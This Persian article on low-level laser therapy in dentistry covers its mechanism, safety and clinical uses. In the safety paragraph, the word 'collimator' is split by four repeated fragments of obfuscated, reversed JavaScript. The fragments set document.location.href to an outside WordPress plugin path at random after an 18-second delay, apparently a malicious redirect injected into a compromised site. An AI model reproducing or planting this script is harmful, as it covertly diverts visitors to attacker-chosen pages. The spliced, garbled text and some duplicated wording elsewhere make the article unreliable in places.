لیزر کم توان

184b7cb84d7b456c96a0bdfbbeaa5f14_XL

کاربرد لیزر کم توان در دندانپزشکی

درمان با لیزرهای کم توان (Low Level Laser Therapy: LLLT) فواید زیادی به همراه دارد. در درجه اول غیر جراحی بودن این روش است که ترمیم بافت را آسان کرده باعث کاهش ادم، التهاب و درد خواهد شد.بیش از سی سال است که شیوهLLLT به عنوان راهی جالب ولی ناشناخته در پزشکی، دندانپزشکی، فیزیوتراپی و اعمال تشخیصی مطرح می باشد.

فلسفه کاربرد لیزرهای کم توان کاربرد مستقیم انرژی نور با توانایی تحرک بیولوژیک روی سلولهای بدن است. گیرنده های نوری سلولی می توانند لیزرهای کم توان را جذب کرده و آن را به داخل میتوکندری منتقل سازند تا سوخت سلولی (ATP)را فراهم سازند.
شایع ترین درمان مورد استفاده با لیزرهای کم توان درکمک به ترمیم زخم ها و اثر ضد التهابی است.

موارد عدم تجویز و مسایل ایمنی
بیش از سی سال است که لیزر درمانی استفاده می شود. تاکنون گزارشی از صدمه دیدن بیمار وجود نداشته است و در کل این نوع از لیزرها که در کلاس 3 قرار می گیرند جزء وسایل پزشکی با خطر آسیب غیرمشهود تقسیم بندی می شوند. آسیب به چشم گرچه حداقل است اما خصوصا در مواردی که حجم زیادی از لیزر غیرمرئی استفاده می شود باید مدنظر قرار گیرد. لیزرهای دایود دارای نور واگرا هستند که با کاربرد تجمیع کننده (collimatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor) می توان آن را کنترل نمود. باید برای بیمار و درمانگر از وسایل محافظ که برای هر طول موج به شکل اختصاصی طراحی شده است، استفاده گردد.
گرچه موردی برای عدم تجویز لیزرهای دندانپزشکی وجود ندارد، چند مورد عارضه جانبی گزارش شده است. موارد مشکوک به بدخیمی را تنها باید متخصص درمان نماید. احتیاط در بیماران با ناهنجاری خونی باید صورت گیرد و افراد با سابقه درد مزمن، دچار کوفتگی وخستگی پس از درمان می شوند و دوره های درد طولانی نیز ممکن است به شکل موقت افزایش پیدا نماید.

کاربرد بالینی:

  • ناهنجاری های TMJ(مفصل گیجگاهی فکی): پیش از آغاز درمان تشخیص مشکل ضروری است. یک مورد جالب از کاربرد لیزر در کاهش سریع کشش و درد روی عضلات مفصل گیجگاهی فکی است. در موارد درد مفصلی نیز از لیزر می توان به عنوان یک درمان کمکی استفاده کرد.
  • حساسیت عاجی: گرچه می توان از مواد گوناگونی برای درمان افزایش حساسیت عاجی استفاده نمود. در موارد مشکل تر می شود از لیزر کمک گرفت.
  • مراقبت پس از کشیدن دندان و درمان های روی استخوان: تاباندن اشعه روی محل کشیدن دندان قبل و پس از جراحی مفید است. همچنین اثر بخشی سریع تر بی حسی موضعی و کاهش خونریزی حین و پس از کشیدن دندان خواهد شد.
  • ارتودنسی: از لیزرتراپی در ارتودنسی، عمدتا در هنگام جابجایی دندان ها و با هدف بهبود وضعیت فانکشنال بافتی و افزایش مقاومت آن در مقابل التهاب (بهبود جریان خون، متابولیزم، استخوان سازی و …)پیشگیری از عوارض ثانویه (التهاب پیشرفته، نکروز بافتی، اختلالات عصبی، …) کاهش مدت درمان جابجایی و ردیف کردن دندانها و تامین ثبات دندان های تحت درمان قرار گرفته استفاده می شود. با استفاده از این امکان، درمان های ارتودنسی در گروه های سنی بالاتر هم نتیجه بخش تر می شود.در بیمارانی که به دلیل بهم ریختگی دندانی شدید , زیاد دچار عفونت و التهاب لثه هستند یا به علت جرم و عدم رعایت بهداشت نیاز به دریافت درمانهای اولیه هستند و قبل از شروع ارتودنسی، لیزرتراپی جهت جلوگیری از بروز التهاب توصیه می شود.

    در طول مدت درمان، به هنگام مراجعه بیمار به پزشک جهت کنترل کار، می توان از اشعه لیزر در ناحیه جابجایی دندان ها و با هدف تسریع این روند و جلوگیری از عوارض آن استفاده نمود. در دوره تثبیت دندان ها (درمان نگهدارنده )، تقویت پروسه استخوان سازی بافتی، تثبیت موقعیت ریشه دندان های جابجا شده و جلوگیری ازجوش فک شدن دندان، لیزرتراپی انجام می شود .

  • هرپس لبی (تبخال) : در نوجوانان و بزرگسالان عفونت ویروس هرپس در لب ها بسیار شایع است. علايم آن می تواند از یک ناراحتی ساده تا درد شدید نمایان شود. کاربرد لیزرهای نرم اثر درمانی مشابه کاربرد آسیکلوویر نشان داده شده است به شرطی که در زمان های سکون مابین حملات ویروس استفاده شود. تابش لیزر باعث ناپدید شدن تاولها پس از 3-2 روز با حداقل ناراحتی می شود که نسبت به دوره معمولی 14-8 روزه آن بسیار کوتاه تر است. لیزرهای کم توان برای کاهش تناوب بروز و خطر عود این ضایعات نیز به کار برد. درمان ضایعات زوستر و نورالژی پس از هرپس نیز امکان پذیر است.

17

  • زخم های آفتی: لیزرهای کم توان با خاصیت کاهش درد و توانایی در کوتاه کردن دوران ترمیم راه حل مناسبی برای درمان آفت هستند.
  • التهاب مخاط: بیمارانی که تحت رادیوتراپی یا شیمی درمانی قرار گرفته اند دچار ضایعات التهابی در مخاط می شوند. موکوزیت دردناک است و گاهی متخصص آنکولوژی را مجبور به کاهش دز یا تعداد جلسات درمان می نماید. نور لیزرهای قرمز را می توان برای کاهش جلسات درمان می نماید. نور لیزرهای قرمز را می توان برای کاهش حساسیت حاصل از موکوزیت یا به شکل پروفیلاکسی قبل از آغاز رادیوتراپی مورد استفاده قرار می گیرد.
  • بیحسی دائمی گوشه لب: یکی از خطرات مهم انواع جراحی های دهان آسیب عصب خصوصا روی عصب فک تحتانی و بی حسی حاصل از آن است. اگرچه اکثر این مشکلات موقتی است. در مواردی نیز ناهنجاری به طول می کشد یا حتی دائمی خواهد شد. کاربرد لیزرهای کم توان پس از پارستزی یا به شکل پروفیلاکتیک پس از جراحی در ناحیه در خطر می تواند در کاهش مشکلات موثر باشد.